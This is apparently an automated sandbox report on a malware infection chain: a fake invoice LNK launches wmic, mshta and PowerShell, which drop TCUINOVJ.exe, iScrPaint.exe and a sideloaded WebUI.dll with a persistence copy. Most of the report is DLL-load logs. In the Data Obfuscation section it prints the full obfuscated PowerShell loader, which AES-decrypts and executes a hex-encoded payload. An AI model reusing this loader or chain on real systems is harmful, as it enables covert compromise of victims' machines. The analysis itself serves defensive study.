                      Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: msimg32.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: version.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: wsock32.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: webui.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: winmm.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: dbghelp.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: pla.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: pdh.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: tdh.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: cabinet.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: wevtapi.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: shdocvw.dll
                      Source: C:\Users\user\iScrPaint.exe | Section loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: msimg32.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: webui.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: dbghelp.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: pla.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: pdh.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: tdh.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: wevtapi.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: shdocvw.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
                      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: shdocvw.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: webio.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winnsi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: schannel.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntasn1.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ncrypt.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: Rechnung736258.pdf.lnk | LNK file: ..\..\..\..\..\..\Windows\System32\Wbem\wmic.exe
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: Binary string: explorer.pdbUGP source: explorer.exe, 00000015.00000003.2562816903.000000000552C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000005.00000003.2666686122.000001C393781000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666568838.000001C3977BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672249767.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665725612.000001C397818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665256230.000001C397868000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2673015925.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667173351.000001C397822000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682666558.000001C397750000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2679787349.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666496000.000001C397800000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667721804.000001C397778000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667474568.000001C393773000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665913555.000001C39376B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666444250.000001C397820000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: inetmib1.pdbGCTL source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840805790.00000000009F6000.00000008.00000001.01000000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: iScrPaint.exe, 00000010.00000002.2299837810.0000000008C1C000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2303494720.0000000008F70000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563431937.0000000004BCD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563913861.0000000005030000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842076242.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842264902.0000000005170000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: inetmib1.pdb source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840805790.00000000009F6000.00000008.00000001.01000000.00000000.sdmp
                      Source: Binary string: c:\Qt\WebUI2\Release\WebUI.pdb source: TCUINOVJ.exe, 0000000F.00000003.2256610867.0000000002F4E000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C257000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B906000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.dr
                      Source: Binary string: wntdll.pdb source: iScrPaint.exe, 00000010.00000002.2299837810.0000000008C1C000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2303494720.0000000008F70000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563431937.0000000004BCD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563913861.0000000005030000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842076242.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842264902.0000000005170000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: sethc.pdb source: mshta.exe, 00000005.00000003.2672249767.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665725612.000001C397818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2673015925.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667173351.000001C397822000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682666558.000001C397750000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2679787349.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667721804.000001C397778000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667474568.000001C393773000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665913555.000001C39376B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666444250.000001C397820000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: explorer.pdb source: explorer.exe, 00000015.00000003.2562816903.000000000552C000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0A23752FE985FC9FD64BB3465A7D797346AC4EB8E6FA6258E6C499D05779F61BCEC012DC00DA9FBBDBA937EA0E7F819DA30D6226959EA7519380176563334C188B79BB6DA507B41F9479C4ECD6FCFBEAC89945BB235377DAFFC2B2E0422A373DF64E2DDF535FA76F2F6195EDE596B0317D4804786027E0B623BF5D1D584D6065AFA5E42CE963A4614903389786638A13BFEAD5BCA6D5632E96589B3891210B8EE6577C079CDE437E55F527D851A6E360A415EC287B6A355E4474FF7AFFC5E1C2C84DF35ED4839335D434B4C6EB3E0E9BE4C9BB60244693023805DB66378A17C37A948E7A51FC5D87A0BC7A2EB7D9F4DA156623A9183F872D54778974ADE95F381DE2AAE416E6172BAAEF2320C24A65879A0D52DAD6FAF25F6401BA3456E99B3F0C534868BB75527DBE10715FC36A8BB44C9977366FA95D0EE4ADCEA23B71915BE1B53B87D12D50B68707404AEFB59E47D774511900EB4509210E15424197DEDADBF6270B4BBDB7CA28491995A87F9A3CB9FC232BFB8DD6FC010D911FB9A85D8D423DDB3D610F88D031C25B6AAAA7F6F7E86773457EBF9E1627E87A801B0A5F69AB28A75F7A7684E8E08FBD622656F168B01419A0F9142A0B1E96F0A4019AC5AE6015EC400D4957D3658DA911E88F29E506EE2B315649007D4AD02B9AC42C6536DF21C03BA8A4513A3E4C547246C363F281F230A226EA7FEAF52932752BB3E5AC1DC92E54264FDEEC820E460FF5BF265D1D5A1A7357FCC07BBCB15D0DFC7AFB18D7D8ED8D11813ABE2565BCF731F20AB1D1A8D393D9E8CCA5D1AC1297CE33468EA8FEA4B579AC4DBD4338C86D8207ED1485FEA355E9CE074FCF496ED4D2CEAAFFBF6FE7CD314D30A0CF1CA039AA1EDC0440C8C082BBC07A3458CB8039EB599B8C59B1EEAE0186F371C0B858E495C81E310381A10B00AA941D672D8F0FDD94D6BCF6344EA8D3CF3BE07A0F29AD3BC172F5FEC0541A77B8007A0BA0BA5CD14298C1D74F200A847C8A8586EDAF36D5C8040A3D244982700F4E595857B0619867A217F8FEEAE91B337EF244871580E0CEC7EC35A6E5C5356234C447A13CF21B5B3DCAF3D5A547E32FB972AE6DDFDA3C0C7198771CA4D327A77575F82B079A6BCE811999F9AA1DBCBBA2938F34BE32EADA581AB69F8BC451713EC828E6D3D62F721EB09FC154CB3D93C7D958C9F426B244650B32A5CDBBF9F9512F07496C1DA9AED38876CC794D20735
94342E5E9B7E851A0C3AE91198802506F7FE48D8430BC5E4C06506680E3D7613B81E01A16CFD524741269AADD19A2E1CF4A2BA75CF3B27D0B2A2C19729DEF1BAA021F00A33B6CBCB211F0D14BB0D6FDB116AC0D76B7EB14848CA0F71871993F73D63256F5FA94A2FAC681186693CF2F3776C5B0D8C1FD35E87EF9FD6CC7633C06DD2ECB5AE82A9FDCE2BB6DA99DB57E009DCDE40871998B8FDCCD59411335EB4B916E81193A27706177634DA7F7994FB1DD6A944AC9DAECDCA2D45C883E465AC6BC3613FFFE963C92F84B60C9183D522E49857344D0E0171A1B4AF1FBF07286E4C23EC443EFA2CAAB4BEBF411FBE1E4799292B05548811AD68EC505467241E859FA3DD71727E100C7C6F8664659725043526B66756D7661597247';function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6)
                      Source: documentcomplie[1].5.dr | Static PE information: 0x9EF0B9FD [Thu Jul 2 03:39:41 2054 UTC]
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Code function: 15_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow, | 15_2_00406D5D
                      Source: WebUI.dll.16.dr | Static PE information: real checksum: 0x7a6eb0 should be: 0x7af0ca
                      Source: WebUI.dll.15.dr | Static PE information: real checksum: 0x7a6eb0 should be: 0x7af0ca
                      Source: TCUINOVJ.exe.7.dr | Static PE information: real checksum: 0x33302 should be: 0x3f9251
                      Source: documentcomplie[1].5.dr | Static PE information: real checksum: 0x1f27b should be: 0x7fe37
                      Source: umffwoglbib.18.dr | Static PE information: real checksum: 0x0 should be: 0x556f9
                      Source: documentcomplie[1].5.dr | Static PE information: section name: .didat
                      Source: WebUI.dll.15.dr | Static PE information: section name: .unwante
                      Source: WebUI.dll.16.dr | Static PE information: section name: .unwante
                      Source: umffwoglbib.18.dr | Static PE information: section name: kygc
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Code function: 15_2_00411C20 push eax; ret | 15_2_00411C4E
                      Source: C:\Users\user\iScrPaint.exe | Code function: 16_2_6C086120 push ecx; ret | 16_2_6C086133
                      Source: C:\Users\user\iScrPaint.exe | Code function: 16_2_6C077B5D push ecx; ret | 16_2_6C077B70
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Code function: 17_2_6B707B5D push ecx; ret | 17_2_6B707B70
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_3_0311960A push cs; iretd | 21_3_03119649
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_3_0311F63A push cs; ret | 21_3_0311F649
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_3_03119453 push edi; iretd | 21_3_03119481
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_3_0311955A push FFFFFFCFh; iretd | 21_3_03119569
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_3_0311955A push 004D32CFh; iretd | 21_3_03119579
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_3_0311F540 push es; ret | 21_3_0311F609
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_3_0311F66A push ss; ret | 21_3_0311F689
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_3_03119483 push ecx; iretd | 21_3_031194B1
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_3_0311968A push ds; iretd | 21_3_031196C9
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_3_0311F4B4 push eax; ret | 21_3_0311F4B9
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_3_0311F6BA push ds; ret | 21_3_0311F6C9

                      Persistence and Installation Behavior

                      Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK file | Process created: C:\Windows\System32\mshta.exe
                      Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK file | Process created: C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | File created: C:\Users\user\iScrPaint.exe
                      Source: C:\Users\user\iScrPaint.exe | File created: C:\Users\user\AppData\Roaming\BackupPatch\WebUI.dll
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | File created: C:\Users\user\WebUI.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\TCUINOVJ.exe
                      Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\umffwoglbib
                      Source: C:\Users\user\iScrPaint.exe | File created: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe
                      Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\documentcomplie[1]

                      Boot Survival

